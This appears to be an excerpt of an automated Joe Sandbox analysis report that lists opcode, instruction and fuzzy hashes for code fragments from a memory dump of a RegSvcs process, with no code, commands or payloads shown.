                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                              • Instruction ID: d388630ee27b3b424baf9eb6d9eab769d256ec8d615fdd8c66678083530c345b
                                                                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                              • Instruction Fuzzy Hash: 682108B5A40B059FD3A0CF29D440B56BBF4FB48720F10492EE98ACBB40E371E814CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction ID: f68f80fbf10fde36823054c983b466dcea64c2ecbe22a08d17bbc8bf7fff6f13
                                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction Fuzzy Hash: 9111A331600601EFEB729F48CC40B5A7BA6EF45754F0A842CEE0A9B254DB32DC41DB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c5ff0c1771f745fe4a125b65f194f984a709091905706666a83f326a014076c
                                                                                                              • Instruction ID: 84bf8afc16bb8a098deaf156069a365df024df84d0b9fd31e53b3e85ad9f430d
                                                                                                              • Opcode Fuzzy Hash: 7c5ff0c1771f745fe4a125b65f194f984a709091905706666a83f326a014076c
                                                                                                              • Instruction Fuzzy Hash: 9601C431645786ABE316A66EDC84F6B6ADCFF80694F050469FA058F291E954EC00C2B2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e6a53e21b5c00f5d5f8f4f28dd0037219c923c50cca5663943308952101bb2d
                                                                                                              • Instruction ID: 244175d609a725ce51eeee8f87385354a03e2a5066193adf768850df777b82ff
                                                                                                              • Opcode Fuzzy Hash: 6e6a53e21b5c00f5d5f8f4f28dd0037219c923c50cca5663943308952101bb2d
                                                                                                              • Instruction Fuzzy Hash: 9C119E36250649AFDF258F59DA80B6E7BA8FB8A664F004519F9058F250C770EC42CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92de5502c4a4ebef37938ee0e6ac7fb45f921a09f0c7f8875c86ad3aa37fecb0
                                                                                                              • Instruction ID: 4d06d1ee72be85fb10269f86e3dd260ef6b116ea4a57c420057f2bb1b6f85ea9
                                                                                                              • Opcode Fuzzy Hash: 92de5502c4a4ebef37938ee0e6ac7fb45f921a09f0c7f8875c86ad3aa37fecb0
                                                                                                              • Instruction Fuzzy Hash: 6911C2362006119FD7229A69DC40F6BB7AAFFC4751F154529EA8287794DF30A802CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 373863abb50ede1054f3fd6493a8c1b5bf2c7132964e881f9903f1c06a1e273c
                                                                                                              • Instruction ID: e5342f020b8916f677024e7edf49d9ad9c0b1bcd77342ef213340259a09b058b
                                                                                                              • Opcode Fuzzy Hash: 373863abb50ede1054f3fd6493a8c1b5bf2c7132964e881f9903f1c06a1e273c
                                                                                                              • Instruction Fuzzy Hash: 9411C276A00616AFDB22EF99CD80B5EFBB8FF84B40F500059DA05AF300D730AE418B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a60a82e954c77d07fc353beb2c52d7106a1c59dd77f2dda213524be9cd5534e
                                                                                                              • Instruction ID: 1f10018a3fcfc6d17f53d6faa32e7a724fcc541956f479d344c85e58013d7863
                                                                                                              • Opcode Fuzzy Hash: 6a60a82e954c77d07fc353beb2c52d7106a1c59dd77f2dda213524be9cd5534e
                                                                                                              • Instruction Fuzzy Hash: 95019275500106AFC725DF19D889FAABBF9FBC5314F24826AE1068F261C7B09C42CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction ID: 3d5dd3244ffd33f6b76805e7f1141ab5cf7d056e5c3869d5876b5018f258b690
                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction Fuzzy Hash: 0A11E5722416C2DBE723976CC984BAD7BD4FB41788F1D04A6DF419FA92F728C842C250
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction ID: 576ec7f1dfc6cd12722fbbcdc8d108c0846a4246f2c1fbc9c855165b51ff611d
                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction Fuzzy Hash: 8A019636700106AFF7265F58CD00F6A7AA9FB85750F098428EE059B264E772DD41C790
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                              • Instruction ID: edbbc46b62c62522605a151ab69509e8ab13b220221d75151d4d5b8c7b8bef4b
                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                              • Instruction Fuzzy Hash: FF0126314047229BDB319F19D840A3A7BE4FF557607008A6EFD96AF281D331D400CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cc9a198552499dc96adcfce31d4e0f74a16f8dbe6db97befd89b79e6c04c698b
                                                                                                              • Instruction ID: fd4e355d6aaf3a1360489699396a535aac68e7bce63d74e362584549c8299e09
                                                                                                              • Opcode Fuzzy Hash: cc9a198552499dc96adcfce31d4e0f74a16f8dbe6db97befd89b79e6c04c698b
                                                                                                              • Instruction Fuzzy Hash: 200104324C11019FC3329F1CDC00E16B7ACEF81374B154315E9A89B292DB30D801CBC0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                                                                              • Instruction ID: 11a565f70b963dbd7b1b5ae44a3b0c653d0f7cfbf62d9948fd8c1d635804f1cc
                                                                                                              • Opcode Fuzzy Hash: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                                                                              • Instruction Fuzzy Hash: 05118B32241642EFDB26EF19DD90F56BBB8FF94B84F200465E9059F6A1C335ED01CA90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                                                                              • Instruction ID: 3e0ce2132b0b441314d494eaa515cce3b17e2f48f1a5f11f8c53a54873b2afaa
                                                                                                              • Opcode Fuzzy Hash: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                                                                              • Instruction Fuzzy Hash: 79115A7054122AABEF75AB68CD52FEDB2B4BF44714F5041D4A318AA0E0DA709E85CF85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                                                                              • Instruction ID: 126f12304e87d594da8e2985f474b2421af066d83c607673305fd8bab4a8e102
                                                                                                              • Opcode Fuzzy Hash: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                                                                              • Instruction Fuzzy Hash: 4E11177790001AABCB21DB94CC80DEFBB7CFF48254F044166E906A7211EA34AA55CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction ID: 72025ccc691f7d8ea476506068ff067f2b97143a58f9cc6de9fa1d3f5a44a081
                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction Fuzzy Hash: 86014733601211ABEF159E6DD884B9AB7ABBFC4700F5544AAED058F246EE71CC81C391
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                                                                              • Instruction ID: efd0229e3c0eb6e0e217b7c598d5b3f2962bf651f18c81ee8a863f61fcffd69d
                                                                                                              • Opcode Fuzzy Hash: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                                                                              • Instruction Fuzzy Hash: 4711A1326445569FD711CF68D800BA6BBB9FB9A314F08C159ED499F315D732EC81CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                                                                              • Instruction ID: ab8f59d0478a38fb732fcadaf482233f096107b8021dcf6fcf9867b6b18e834c
                                                                                                              • Opcode Fuzzy Hash: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                                                                              • Instruction Fuzzy Hash: 0F111CB1A0020ADBCB00DF99D585A9EBBF4FF58250F14406AA905E7351D674EA018BA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                                                                              • Instruction ID: cbd58ce1859913511a51ca98b5a7b279321b30e7498ceb5a7f0fe6ff7ee2bfbb
                                                                                                              • Opcode Fuzzy Hash: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                                                                              • Instruction Fuzzy Hash: B9017135580212ABC732AE19CC5097BBBB9FFD2650B45842AE945AF711DB22DC43CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction ID: 8c878b7419840832ebbbfcd784b3c763320543ef879aba43c4fa0da816c5fecc
                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction Fuzzy Hash: A201B532500706DFEB26AAAAC844AABB7F9FFC5654F04481EA9469F540DE70E402CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                                                                              • Instruction ID: 37816373825f99689badd9dd585113fdf17ff4cdf775bbac5802cca35bc6565b
                                                                                                              • Opcode Fuzzy Hash: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                                                                              • Instruction Fuzzy Hash: 28112D75A0120DEBDB15DFA8CC51AAE7BB5FB84694F008099E9059B290D635AE11CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                                                                              • Instruction ID: 6d28502f2679fd6c62591fc5a90d87c1d8f1ab26f535678d45e01fa96907892e
                                                                                                              • Opcode Fuzzy Hash: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                                                                              • Instruction Fuzzy Hash: 1D0184B1691902BFD251BB69CD81E5BBBECFF99654B400629B1098BA51DB24EC01C6A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                                                                              • Instruction ID: 8819c2c18be742037dd3091dbd20382b5cd7009c05aba803b3a043032ab04d6b
                                                                                                              • Opcode Fuzzy Hash: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                                                                              • Instruction Fuzzy Hash: 2901FC32214616DBC320DF6ECC4896BFBA8FF94660F114229ED598B2D0E7309911CBD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                                                                              • Instruction ID: 004db199c1632c4f2e2d3b323b245ccf595c1580f9f9f45a60fe6867c682e182
                                                                                                              • Opcode Fuzzy Hash: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                                                                              • Instruction Fuzzy Hash: BB115B75A41209EBDB15EFA8C844EAE7BB6FB98250F044059F90197354DA34E911CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                                                                              • Instruction ID: 7609dc94053ea57eef1e0da4320d136c7d2bccbf7bb5fb141e75a628469b28aa
                                                                                                              • Opcode Fuzzy Hash: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                                                                              • Instruction Fuzzy Hash: 941179B16083099FC710DF69C84195FBBE4FF98310F00891AB998DB3A0E630E900CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                                                                              • Instruction ID: 3252bc532f6a6d86ade8d1d3e23a14b6a829ba1b833499f0f6aceaa886fc9b1d
                                                                                                              • Opcode Fuzzy Hash: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                                                                              • Instruction Fuzzy Hash: 551179B26083099FC310DF6DC84194FBBE4FF99350F00851AB958DB3A4E630E900CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction ID: a3a7aa74c07b9d7af6f05b577064662136f123f6360b54473625999e5cbb022a
                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction Fuzzy Hash: B9017832680681DFE326861DC948F2EBBE8FB88794F4904A1FA05CF6A1D678DC40C661
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                                                                              • Instruction ID: 6cc030d491305e450f8b05f5bb72dabfaa3385787f30fbe58d59d3b01a98685d
                                                                                                              • Opcode Fuzzy Hash: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                                                                              • Instruction Fuzzy Hash: 6D018431700A09DBDB14FB69DC149AE77E9FF81610B594169DA02BF644EE20DD01C794
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                                                                              • Instruction ID: 4db9de742a750e5a2d4baec6db52aa9a223a150fe81323f3aca4c333af119f5c
                                                                                                              • Opcode Fuzzy Hash: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                                                                              • Instruction Fuzzy Hash: 62018F71680602AFD3366F19DD41F16BAA8AF95F50F01442AE2069F390D7B1D8418B68
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0bffc3cfe6f30539782651115a4148e5cf654556a4943605ee886c577cbef9d8
                                                                                                              • Instruction ID: 44492d2ceaf5e4fe2fd048af4741ce7187c71b1960e4ba66756c8eb646af87c0
                                                                                                              • Opcode Fuzzy Hash: 0bffc3cfe6f30539782651115a4148e5cf654556a4943605ee886c577cbef9d8
                                                                                                              • Instruction Fuzzy Hash: 83F0A932A41711BBC731DB568D50F5BBEA9FFC4B90F154429A6059F640DA30DD01C6A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction ID: ec5709b8e8d06f22214f30a710943d5235413cc96c4b33a7a736e5ecfbc925c8
                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction Fuzzy Hash: 9DF062B2600615ABD334CF4DDC40E5BFBEAEBD5A90F058169A655DB220EA31ED05CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 63a459c41247ce3840923c2050808af652d257fb008746d452961558af114f77
                                                                                                              • Instruction ID: d54ec5bd5e72320aab256aa20913cc8cf19d607a47fe79f428d8ae2e804f9ab0
                                                                                                              • Opcode Fuzzy Hash: 63a459c41247ce3840923c2050808af652d257fb008746d452961558af114f77
                                                                                                              • Instruction Fuzzy Hash: 83014471A1020AEFDB04DFADE95599EB7F8FF98304F10406AF904EB350D7749A018BA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction ID: 47b808f967b7de3f08240f374ba88e28acbe6445d1a4b40ea57335f3e7e289f4
                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction Fuzzy Hash: 49F0FC73244623ABD73236598840BAFB9D5BFE1A64F1A0035E205BF240CD648D0396F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1aeea00990fc23f5e7952d9dd956eca532c93506c6da8865d04db64488a0999
                                                                                                              • Instruction ID: 0ad8ed437f5469048a41f82027ffd0f5a1253553def07e6f78293d820389be5e
                                                                                                              • Opcode Fuzzy Hash: d1aeea00990fc23f5e7952d9dd956eca532c93506c6da8865d04db64488a0999
                                                                                                              • Instruction Fuzzy Hash: 35014471A1020AEFCB04DFA9D8559AEB7F8FF98344F10806AF904EB351D6749901CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
